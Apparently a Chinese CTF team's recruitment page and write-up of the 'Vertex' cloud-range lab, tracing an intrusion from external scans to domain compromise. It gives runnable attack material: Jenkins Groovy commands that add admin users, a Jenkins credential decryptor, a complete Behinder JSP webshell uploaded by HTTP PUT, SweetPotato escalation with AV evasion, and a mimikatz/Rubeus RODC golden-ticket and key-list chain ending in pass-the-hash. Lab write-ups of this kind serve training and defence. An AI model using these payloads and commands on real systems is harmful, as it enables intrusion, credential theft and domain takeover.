Recruiting
N0wayBack
- Recruitment notes -
Requirements
· At least one year of CTF experience
· Passionate about cyber security and enjoys CTF
· Communicates normally with people and does not enjoy passive-aggressive snark; willing to contribute and share, improving yourself while helping others
· Has time to take part in competitions and follows the team's management and arrangements
· Competition winners and standout players are considered case by case
· Not a member of another inter-university team
· The experience requirement is relaxed for first-year students case by case
Contact
Send your résumé to the mailbox
· Résumé mailbox: [email protected]
春秋云境 (Chunqiu Cloud Range) - Vertex
A speedrun memento.
Initial reconnaissance
fscan output for the two external targets:
8.130.146.122:80 open
8.130.146.122:1433 open
8.130.146.122:2383 open
8.130.146.122:3389 open
8.130.146.122:8000 open
8.130.146.122:8172 open
8.130.146.122:16453 open
8.130.146.122:16452 open
8.130.146.122:16450 open
8.130.146.122:16451 open
8.130.146.122:17001 open
8.130.146.122:47001 open
8.130.146.122:49665 open
8.130.146.122:49664 open
8.130.146.122:49666 open
8.130.146.122:49667 open
8.130.146.122:49669 open
8.130.146.122:49668 open
8.130.146.122:49670 open
8.130.146.122:49680 open
[*] alive ports len is: 20
start vulscan
[*] WebTitle http://8.130.146.122 code:200 len:43679 title:VertexSoft
[*] WebTitle http://8.130.146.122:47001 code:404 len:315 title:Not Found
[*] WebTitle https://8.130.146.122:8172 code:404 len:0 title:None
[*] WebTitle http://8.130.146.122:8000 code:200 len:4018 title:Modbus Monitor - VertexSoft Internal Attendance System
39.101.72.198:84 open
39.101.72.198:22 open
39.101.72.198:8080 open
39.101.72.198:10000 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://39.101.72.198:8080 code:302 len:0 title:None redirect url: http://39.101.72.198:8080/login;jsessionid=FC5DFD503FC5E05632FD0905B692A5F4
[*] WebTitle http://39.101.72.198:8080/login;jsessionid=FC5DFD503FC5E05632FD0905B692A5F4 code:200 len:1383 title:Master ERP login Form
[+] PocScan http://39.101.72.198:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://39.101.72.198:8080 poc-yaml-springboot-env-unauth spring2
flag1
The heapdump leaks the Shiro key; Shiro deserialization gives RCE.
Request /actuator/heapdump, download the dump, and pull the key out of it with a tool.
RCE with a Shiro exploit tool.
The first flag is in the root directory.
The Shiro host has no outbound network access, so the implant has to be a bind (forward) one, and the pivot has to be a forward proxy as well (I used gost).
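The "tool" step above is worth seeing in code. A Spring Boot heapdump is a plain HotSpot HPROF file: a header, then a stream of records that are each tag(u1) time(u4) length(u4) body, so every record can be skipped by its length and the STRING_IN_UTF8 records (tag 0x01) can be read out. The Shiro rememberMe key is a base64 AES key (Shiro's own default is kPH+bIxk5D2deZiIxcaaaA==), so filtering the strings down to base64 that decodes to a 16/24/32-byte value gives a short candidate list. The walker below is an added example written for this writeup, not code from the page or from the tool the author used; the sample dump it parses is constructed in buildSampleDump and does not reproduce the lab's heapdump. Keys that only exist as a byte[] field of CookieRememberMeManager (not as a string constant) need the HEAP_DUMP segment walked as well, which is what full heapdump tools do and this walker does not; newer Spring Boot versions also gzip the dump, so decompress first.

```go
package main

import (
	"bytes"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
	"os"
)

// hprofStrings walks the top-level record stream of an HPROF heap dump and
// returns the payloads of all STRING_IN_UTF8 records (tag 0x01). Records of
// any other type are skipped using their length field.
func hprofStrings(dump []byte) ([]string, error) {
	nul := bytes.IndexByte(dump, 0)
	if nul < 0 || !bytes.HasPrefix(dump, []byte("JAVA PROFILE")) {
		return nil, errors.New("not an HPROF file (gzipped heapdump?)")
	}
	pos := nul + 1
	if len(dump) < pos+12 {
		return nil, errors.New("truncated HPROF header")
	}
	idSize := int(binary.BigEndian.Uint32(dump[pos:]))
	pos += 4 + 8 // identifier size, then a u8 timestamp
	var out []string
	for pos+9 <= len(dump) {
		tag := dump[pos]
		length := int(binary.BigEndian.Uint32(dump[pos+5:]))
		end := pos + 9 + length
		if end > len(dump) {
			return out, errors.New("truncated HPROF record")
		}
		if tag == 0x01 && length >= idSize {
			// body = string ID (idSize bytes) followed by raw UTF-8 text
			out = append(out, string(dump[pos+9+idSize:end]))
		}
		pos = end
	}
	return out, nil
}

// shiroKeyCandidates keeps the strings that look like a Shiro rememberMe
// key: valid base64 that decodes to a 16-, 24- or 32-byte AES key.
func shiroKeyCandidates(strs []string) []string {
	var keys []string
	for _, s := range strs {
		raw, err := base64.StdEncoding.DecodeString(s)
		if err != nil {
			continue
		}
		if n := len(raw); n == 16 || n == 24 || n == 32 {
			keys = append(keys, s)
		}
	}
	return keys
}

// buildSampleDump fabricates a tiny HPROF file for offline testing (constructed
// data, not the lab's heapdump): header, STRING records, and a HEAP_DUMP
// record that the walker has to step over.
func buildSampleDump() []byte {
	var b bytes.Buffer
	b.WriteString("JAVA PROFILE 1.0.2\x00")
	binary.Write(&b, binary.BigEndian, uint32(8)) // identifier size
	binary.Write(&b, binary.BigEndian, uint64(0)) // dump timestamp
	rec := func(tag byte, body []byte) {
		b.WriteByte(tag)
		binary.Write(&b, binary.BigEndian, uint32(0))         // time offset
		binary.Write(&b, binary.BigEndian, uint32(len(body))) // body length
		b.Write(body)
	}
	str := func(id uint64, s string) {
		body := make([]byte, 8, 8+len(s))
		binary.BigEndian.PutUint64(body, id)
		rec(0x01, append(body, s...))
	}
	str(1, "java.lang.Object")
	str(2, "kPH+bIxk5D2deZiIxcaaaA==")        // Shiro's default rememberMe key
	rec(0x0c, []byte{0xff, 0x00, 0x01, 0x02}) // HEAP_DUMP segment, skipped
	str(3, "bm90IGEga2V5")                     // valid base64 but only 9 bytes
	str(4, "2AvVhdsgUs0FSA3SDFAdag==")        // another 16-byte candidate
	return b.Bytes()
}

func main() {
	dump := buildSampleDump()
	if len(os.Args) > 1 { // go run . /path/to/heapdump
		var err error
		if dump, err = os.ReadFile(os.Args[1]); err != nil {
			fmt.Fprintln(os.Stderr, err)
			os.Exit(1)
		}
	}
	strs, err := hprofStrings(dump)
	if err != nil {
		fmt.Fprintln(os.Stderr, "warning:", err)
	}
	for _, k := range shiroKeyCandidates(strs) {
		fmt.Println("candidate key:", k)
	}
}
```

Each candidate is then tried against a real rememberMe cookie (or by sending a probe cookie and watching for the rememberMe=deleteMe response) before building the deserialization payload.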
Internal reconnaissance
Internal scan through the proxy (fscan output):
192.168.8.42:22 open
192.168.8.146:22 open
192.168.8.12:53 open
192.168.8.42:80 open
192.168.8.9:80 open
192.168.8.12:88 open
192.168.8.146:84 open
192.168.8.26:135 open
192.168.8.16:135 open
192.168.8.12:135 open
192.168.8.38:135 open
192.168.8.9:135 open
192.168.8.26:139 open
192.168.8.16:139 open
192.168.8.38:139 open
192.168.8.12:139 open
192.168.8.9:139 open
192.168.8.12:389 open
192.168.8.12:464 open
192.168.8.26:445 open
192.168.8.16:445 open
192.168.8.38:445 open
192.168.8.9:445 open
192.168.8.12:445 open
192.168.8.12:593 open
192.168.8.12:636 open
192.168.8.9:1433 open
192.168.8.9:2383 open
192.168.8.12:3268 open
192.168.8.12:3269 open
192.168.8.38:3306 open
192.168.8.12:3389 open
192.168.8.9:3389 open
192.168.8.38:3389 open
192.168.8.26:3389 open
192.168.8.16:3389 open
192.168.8.9:8000 open
192.168.8.42:8060 open
192.168.8.146:8080 open
192.168.8.16:8080 open
192.168.8.26:8080 open
192.168.8.9:8172 open
192.168.8.42:9094 open
192.168.8.12:9389 open
192.168.8.9:16450 open
192.168.8.9:16451 open
192.168.8.9:16452 open
192.168.8.9:16453 open
192.168.8.9:17001 open
192.168.8.38:33060 open
192.168.8.12:47001 open
192.168.8.38:47001 open
192.168.8.9:47001 open
192.168.8.16:47001 open
192.168.8.26:47001 open
192.168.8.12:49664 open
192.168.8.9:49664 open
192.168.8.16:49664 open
192.168.8.38:49664 open
192.168.8.26:49664 open
192.168.8.12:49665 open
192.168.8.16:49665 open
192.168.8.9:49665 open
192.168.8.38:49665 open
192.168.8.26:49665 open
192.168.8.12:49666 open
192.168.8.16:49666 open
192.168.8.38:49666 open
192.168.8.9:49666 open
192.168.8.26:49666 open
192.168.8.12:49667 open
192.168.8.16:49667 open
192.168.8.9:49667 open
192.168.8.38:49667 open
192.168.8.26:49667 open
192.168.8.12:49668 open
192.168.8.16:49668 open
192.168.8.9:49668 open
192.168.8.38:49668 open
192.168.8.26:49668 open
192.168.8.16:49669 open
192.168.8.9:49669 open
192.168.8.38:49669 open
192.168.8.26:49669 open
192.168.8.9:49670 open
192.168.8.16:49670 open
192.168.8.38:49671 open
192.168.8.26:49671 open
192.168.8.16:49675 open
192.168.8.26:49676 open
192.168.8.38:49677 open
192.168.8.9:49680 open
192.168.8.12:51757 open
192.168.8.12:54183 open
192.168.8.12:54184 open
192.168.8.12:54190 open
192.168.8.12:54200 open
192.168.8.12:54231 open
192.168.8.12:54251 open
192.168.8.12:54281 open
[*] NetInfo:
[*]192.168.8.26
   [->]WIN-PC3788
   [->]192.168.8.26
[*] NetInfo:
[*]192.168.8.38
   [->]WIN-OPS88
   [->]192.168.8.38
[*] NetInfo:
[*]192.168.8.9
   [->]WIN-IISSERER
   [->]192.168.8.9
[*] NetInfo:
[*]192.168.8.12
   [->]RODC
   [->]192.168.8.12
[*] NetInfo:
[*]192.168.8.16
   [->]WIN-SERVER03
   [->]192.168.8.16
[*] WebTitle: http://192.168.8.9 code:200 len:43679 title:VertexSoft
[*] NetBios: 192.168.8.26 WORKGROUP\WIN-PC3788
[*] NetBios: 192.168.8.12 [+]DC VERTEXSOFT\RODC
[*] NetBios: 192.168.8.16 WORKGROUP\WIN-SERVER03
[*] NetBios: 192.168.8.38 WORKGROUP\WIN-OPS88
[*] NetBios: 192.168.8.9 WORKGROUP\WIN-IISSERER
[*] WebTitle: http://192.168.8.42 code:302 len:99 title:None redirect url: http://192.168.8.42/users/sign_in
[*] WebTitle: http://192.168.8.38:47001 code:404 len:315 title:Not Found
[*] WebTitle: http://192.168.8.146:8080 code:302 len:0 title:None redirect url: http://192.168.8.146:8080/login;jsessionid=808957894EEBA788A827EFE55BE0FF5C
[*] WebTitle: http://192.168.8.9:8000 code:200 len:4018 title:Modbus Monitor - VertexSoft Internal Attendance System
[*] WebTitle: http://192.168.8.42:8060 code:404 len:555 title:404 Not Found
[*] WebTitle: http://192.168.8.12:47001 code:404 len:315 title:Not Found
[*] WebTitle: http://192.168.8.26:47001 code:404 len:315 title:Not Found
[*] WebTitle: http://192.168.8.9:47001 code:404 len:315 title:Not Found
[*] WebTitle: https://192.168.8.9:8172 code:404 len:0 title:None
[*] WebTitle: http://192.168.8.146:8080/login;jsessionid=808957894EEBA788A827EFE55BE0FF5C code:200 len:1383 title:Master ERP login Form
[*] WebTitle: http://192.168.8.26:8080 code:200 len:147 title:第一个 JSP 程序 (My first JSP program)
[*] WebTitle: http://192.168.8.16:47001 code:404 len:315 title:Not Found
[*] WebTitle: http://192.168.8.42/users/sign_in code:200 len:11166 title:登录 · GitLab (Sign in · GitLab)
[*] WebTitle: http://192.168.8.16:8080 code:403 len:594 title:None
[+] mysql:192.168.8.38:3306:root 123456
[+] http://192.168.8.146:8080 poc-yaml-spring-actuator-heapdump-file
[+] http://192.168.8.146:8080 poc-yaml-springboot-env-unauth spring2
There is a lot here; start with the Jenkins on .16.
flag2
The following route runs a Groovy script directly, which is RCE:
http://192.168.8.16:8080/manage/script
Add a user and go get the flag:
println "net user Chu0 whoami@666 /add".execute().text
println "net localgroup administrators Chu0 /add".execute().text
The flag is in the Administrator user's directory.
flag3
Jenkins holds a GitLab credential.
It can be decrypted to plaintext from the script console, since hudson.util.Secret has the master key available on the controller:
println(hudson.util.Secret.fromString("{AQAAABAAAAAgvBTIIfz3QQnmD8y+ncKsVDqTEsdqjxdp/rkK9tRPkckOfP9xBtu6uqckTjQJ6gJj}").getPlainText())
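The one-liner above only works with a script console. If you instead have file access to $JENKINS_HOME (secrets/master.key, secrets/hudson.util.Secret and credentials.xml), the same value can be recovered offline, because hudson.util.Secret's scheme is documented by its own source: the AES key is the first 16 bytes of hudson.util.Secret decrypted with AES-ECB under SHA-256(master.key)[:16], checked by the marker ::::MAGIC::::, and each {...} value in credentials.xml is base64 of 0x01 | ivLen(u32) | dataLen(u32) | iv | AES-CBC-PKCS5(data). The blob quoted above starts with AQAAABAAAAAg, which decodes to exactly that header with a 16-byte IV and 32 bytes of data, so the plaintext is 17 to 32 bytes long. The decryptor below is an added example for this writeup, not Jenkins code or the author's; sampleSecrets constructs a consistent master.key, hudson.util.Secret and credential blob (the GitLab token from this page as the sample plaintext) so it runs offline, and does not reproduce the lab's files.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
	"strings"
)

const jenkinsMagic = "::::MAGIC::::"

// pkcs5Pad pads b to a whole number of AES blocks (Jenkins uses PKCS5Padding).
func pkcs5Pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	return append(append([]byte{}, b...), bytes.Repeat([]byte{byte(n)}, n)...)
}

// ecb runs the block cipher block by block; Go's stdlib has no ECB mode helper.
func ecb(block cipher.Block, src []byte, decrypt bool) ([]byte, error) {
	if len(src)%aes.BlockSize != 0 {
		return nil, errors.New("input is not a multiple of the AES block size")
	}
	dst := make([]byte, len(src))
	for i := 0; i < len(src); i += aes.BlockSize {
		if decrypt {
			block.Decrypt(dst[i:i+aes.BlockSize], src[i:i+aes.BlockSize])
		} else {
			block.Encrypt(dst[i:i+aes.BlockSize], src[i:i+aes.BlockSize])
		}
	}
	return dst, nil
}

// confidentialityKey mirrors hudson.util.Secret: decrypt secrets/hudson.util.Secret
// with AES-ECB under SHA-256(master.key)[:16]; the plaintext must contain the
// magic marker and its first 16 bytes are the credential key.
func confidentialityKey(masterKey, hudsonSecret []byte) ([]byte, error) {
	h := sha256.Sum256(masterKey) // master.key read as raw bytes, trailing newline stripped
	block, err := aes.NewCipher(h[:16])
	if err != nil {
		return nil, err
	}
	plain, err := ecb(block, hudsonSecret, true)
	if err != nil {
		return nil, err
	}
	if !bytes.Contains(plain, []byte(jenkinsMagic)) {
		return nil, errors.New("magic marker missing: wrong master.key or hudson.util.Secret")
	}
	return plain[:16], nil
}

// decryptSecret decrypts a "{...}" credentials.xml value in the IV-prefixed
// format Jenkins has used since 2016.
func decryptSecret(encoded string, key []byte) ([]byte, error) {
	raw, err := base64.StdEncoding.DecodeString(strings.Trim(encoded, "{}"))
	if err != nil {
		return nil, err
	}
	if len(raw) < 9 || raw[0] != 0x01 {
		return nil, errors.New("not the IV-prefixed secret format (old ECB format)")
	}
	ivLen := int(binary.BigEndian.Uint32(raw[1:5]))
	dataLen := int(binary.BigEndian.Uint32(raw[5:9]))
	if dataLen == 0 || dataLen%aes.BlockSize != 0 || len(raw) < 9+ivLen+dataLen {
		return nil, errors.New("malformed secret payload")
	}
	iv, data := raw[9:9+ivLen], raw[9+ivLen:9+ivLen+dataLen]
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	plain := make([]byte, dataLen)
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(plain, data)
	pad := int(plain[len(plain)-1])
	if pad < 1 || pad > aes.BlockSize {
		return nil, errors.New("bad PKCS5 padding: wrong key?")
	}
	return plain[:len(plain)-pad], nil
}

// sampleSecrets fabricates a consistent master.key, hudson.util.Secret and an
// encrypted credential. Constructed data for the example; it is not the lab's.
func sampleSecrets() (masterKey, hudsonSecret []byte, encoded string) {
	masterKey = []byte("3f2a9c1e7b4d8e6f0a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d4e5f6071")
	confKey := []byte("demo-conf-key-16") // the 16-byte key hudson.util.Secret protects
	h := sha256.Sum256(masterKey)
	mk, _ := aes.NewCipher(h[:16])
	hudsonSecret, _ = ecb(mk, pkcs5Pad(append(append([]byte{}, confKey...), jenkinsMagic...)), false)

	iv := []byte("demo-iv-16-bytes")
	plain := pkcs5Pad([]byte("glpat-bGEgHAJDvwaPP78rsLeS")) // 26 bytes pad to 32
	ck, _ := aes.NewCipher(confKey)
	data := make([]byte, len(plain))
	cipher.NewCBCEncrypter(ck, iv).CryptBlocks(data, plain)

	var buf bytes.Buffer
	buf.WriteByte(0x01)
	binary.Write(&buf, binary.BigEndian, uint32(len(iv)))
	binary.Write(&buf, binary.BigEndian, uint32(len(data)))
	buf.Write(iv)
	buf.Write(data)
	return masterKey, hudsonSecret, "{" + base64.StdEncoding.EncodeToString(buf.Bytes()) + "}"
}

func main() {
	masterKey, hudsonSecret, encoded := sampleSecrets()
	key, err := confidentialityKey(masterKey, hudsonSecret)
	if err != nil {
		panic(err)
	}
	plain, err := decryptSecret(encoded, key)
	if err != nil {
		panic(err)
	}
	fmt.Printf("%s -> %s\n", encoded, plain)
}
```

The magic-marker check is what tells you the master.key is the right one before you start decrypting credentials; a wrong key yields random bytes and a clean error instead of garbage.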
Use the token to list the GitLab projects through the API:
curl --header "PRIVATE-TOKEN: glpat-bGEgHAJDvwaPP78rsLeS" "http://192.168.8.42/api/v4/projects"
Clone the project sources:
git clone http://192.168.8.42:[email protected]/vertexsoft/vertexsoftbackup.git
git clone http://192.168.8.42:[email protected]/vertexsoft/hexo.git
git clone http://192.168.8.42:[email protected]/vertexsoft/vertexapp.git
git clone http://192.168.8.42:[email protected]/vertexsoft/erp_old.git
git clone http://192.168.8.42:[email protected]/vertexsoft/portalcode.git
A flag is in backup.txt inside vertexsoftbackup.
flag4
Auditing the cloned portalcode project turns up the following.
The SQL Server connection is in there, but its password is hidden from the source. This code is in fact the other entry point (the VertexSoft site on 8.130.146.122), so go back there and register an arbitrary user; one page turns out to require the admin role.
Go back to the registration form, intercept the request, and change role to admin.
Now the previously blocked page opens, and its export button downloads a list.
Changing the file name in the download request turns this into an arbitrary file read, which yields the SQL Server password:
/User/DownloadFile?download=Export&fileName=../Web.Config
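What goes wrong in that download handler is the classic shape: the export directory and the user-supplied fileName are concatenated and opened, so "../Web.Config" walks one level up out of the export folder and into the application root. The check below is an added example for this writeup (Go rather than the ASP.NET the portal is written in; the .NET equivalent is Path.GetFullPath on the joined path followed by a StartsWith against the export directory), not the portal's code. The directory and file names are assumptions for illustration. It shows the naive join beside a containment check that works on the cleaned absolute path, so "..", "sub/../..", and absolute inputs are all caught rather than just the literal string "..".

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// naiveExportPath is the pattern behind the bug: the user-controlled fileName
// is glued onto the export directory, so "../Web.Config" escapes it.
func naiveExportPath(exportDir, fileName string) string {
	return exportDir + "/" + fileName
}

// safeExportPath resolves fileName under exportDir and rejects anything that
// does not stay inside it once the path is cleaned. The check runs on the
// cleaned absolute path (after any URL decoding), never on the raw string.
func safeExportPath(exportDir, fileName string) (string, error) {
	base, err := filepath.Abs(exportDir)
	if err != nil {
		return "", err
	}
	// Join cleans the result, so ".." components are resolved here and an
	// absolute fileName is re-rooted under base instead of replacing it.
	target := filepath.Join(base, fileName)
	rel, err := filepath.Rel(base, target)
	if err != nil || rel == "." || rel == ".." ||
		strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", fmt.Errorf("fileName %q escapes the export directory", fileName)
	}
	return target, nil
}

func main() {
	for _, name := range []string{"report.csv", "../Web.Config", "sub/../../Web.Config"} {
		fmt.Printf("naive: %s\n", naiveExportPath("/srv/app/exports", name))
		if p, err := safeExportPath("/srv/app/exports", name); err != nil {
			fmt.Printf("safe : rejected (%v)\n", err)
		} else {
			fmt.Printf("safe : %s\n", p)
		}
	}
}
```

For an export endpoint that only ever serves files the application itself generated, the stricter fix is to not accept a file name at all: look the export up by an ID and map it to a path server-side.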
Connect with MDUT and get a shell.
Privilege escalation is needed: upload SweetPotato (甜土豆), after running it through some AV-evasion tool, since the box has antivirus.
As usual, add a user, RDP in and find the flag.
flag5
The container on 192.168.8.26:8080 accepts HTTP PUT, so the Behinder (冰蝎) JSP shell can be written straight to /backup/upload/:
PUT /backup/upload/index1.jsp HTTP/1.1
Host: 192.168.8.26:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=A377FCF0DA5A1767C46C7478027926F9; JSESSIONID=0F908F3AE0576C6145257C8E9395272C
Connection: close

<%@page import="java.util.*,java.io.*,javax.crypto.*,javax.crypto.spec.*" %>
<%!
// XOR-decode the request body with the 16-byte shell key
private byte[] Decrypt(byte[] data) throws Exception {
    String key = "e45e329feb5d925b";
    for (int i = 0; i < data.length; i++) {
        data[i] = (byte) ((data[i]) ^ (key.getBytes()[i + 1 & 15]));
    }
    return data;
}
%>
<%!
// Minimal class loader that defines a class from raw bytes
class U extends ClassLoader {
    U(ClassLoader c) { super(c); }
    public Class g(byte[] b) { return super.defineClass(b, 0, b.length); }
}
%>
<%
if (request.getMethod().equals("POST")) {
    ByteArrayOutputStream bos = new ByteArrayOutputStream();
    byte[] buf = new byte[512];
    int length = request.getInputStream().read(buf);
    while (length > 0) {
        byte[] data = Arrays.copyOfRange(buf, 0, length);
        bos.write(data);
        length = request.getInputStream().read(buf);
    }
    out.clear();
    out = pageContext.pushBody();
    // decode, define and instantiate the class sent by the client, handing it the page context
    new U(this.getClass().getClassLoader()).g(Decrypt(bos.toByteArray())).newInstance().equals(pageContext);
}
%>
Connect with Behinder (冰蝎). Privilege escalation is needed again; the same method as above works.
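For reference, the server-side setting that lets a PUT like the one above create a JSP is, if the container is Tomcat, the DefaultServlet's readonly init-param in conf/web.xml. The page does not name the container, so this is an added reference fragment and an assumption, not configuration taken from the lab:

```xml
<!-- conf/web.xml, DefaultServlet. readonly=false makes the servlet honour
     PUT and DELETE, which is what turns an unauthenticated PUT into a webshell. -->
<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>   <!-- weak: accepts PUT -->
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>

<!-- hardened: true is also the default, so simply removing the param is enough -->
<init-param>
    <param-name>readonly</param-name>
    <param-value>true</param-value>
</init-param>
```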
flag6
The MySQL weak password plus a UDF gives yet another shell. The environment is laggy here; just wait it out.
As usual, create a user, RDP in and find the flag.
flag7
In the administrator's directory on the captured MySQL box there is a CSV with some account information.
Run the whole list through cme:
proxychains4 crackmapexec smb 192.168.8.12 -u user.txt -p pass.txt -d VERTEXSOFT 2>/dev/null
The users do exist, but every one of them must change its password first, so connect over RDP (rdesktop below) to do that:
proxychains4 rdesktop 192.168.8.12
After changing the password the RDP login succeeds. This machine is the RODC; the last flag is on the DC itself.
flag8
Reference: https://blog.csdn.net/dzqxwzoe/article/details/132020707
Recon
mimikatz.exe "log" "privilege::debug" "lsadump::lsa /patch" "exit"
This yields the hash of krbtgt_4156 and the SID of the current domain. krbtgt_4156 is the RODC's own krbtgt account: every RODC gets a krbtgt_<number> account, and the tickets that RODC issues are signed with its key rather than with the domain krbtgt's. See the referenced blog for how that account comes about.
Clear the msDS-NeverRevealGroup attribute
Set-DomainObject -Identity 'CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local' -Clear 'msDS-NeverRevealGroup'
Add the domain administrator to the msDS-RevealOnDemandGroup attribute. The writable DC only honours a key-list request from an RODC for accounts that RODC is allowed to cache, and Administrator is denied by default, so it has to be allowed here and removed from the deny list above:
Set-DomainObject -Identity 'CN=RODC,OU=Domain Controllers,DC=vertexsoft,DC=local' -Set @{'msDS-RevealOnDemandGroup'=@('CN=Administrator,CN=Users,DC=vertexsoft,DC=local')}
Forge a golden ticket signed with the RODC krbtgt key (the /rodcNumber goes into the kvno so the DC picks the right krbtgt_ key to validate it):
Rubeus.exe golden /rodcNumber:4156 /rc4:34e335179246ef930dc33fd1e3de6e9e /user:administrator /id:500 /domain:vertexsoft.local /sid:S-1-5-21-1670446094-1720415002-1380520873
Obtain the hash of the impersonated user: the TGS-REQ to the full DC carries a KERB-KEY-LIST-REQ, and the DC answers it with the account's NT hash:
Rubeus.exe asktgs /enctype:rc4 /keyList /service:krbtgt/vertexsoft.local /dc:DC.vertexsoft.local /ticket:<base64 ticket from the golden step>
Then pass the hash:
proxychains4 impacket-smbexec -hashes :EBC447441306783742EE3DF769051B75 VERTEXSOFT.LOCAL/[email protected]
Originally published on the WeChat public account N0wayBack: 春秋云境-Vertex WriteUp By Chu0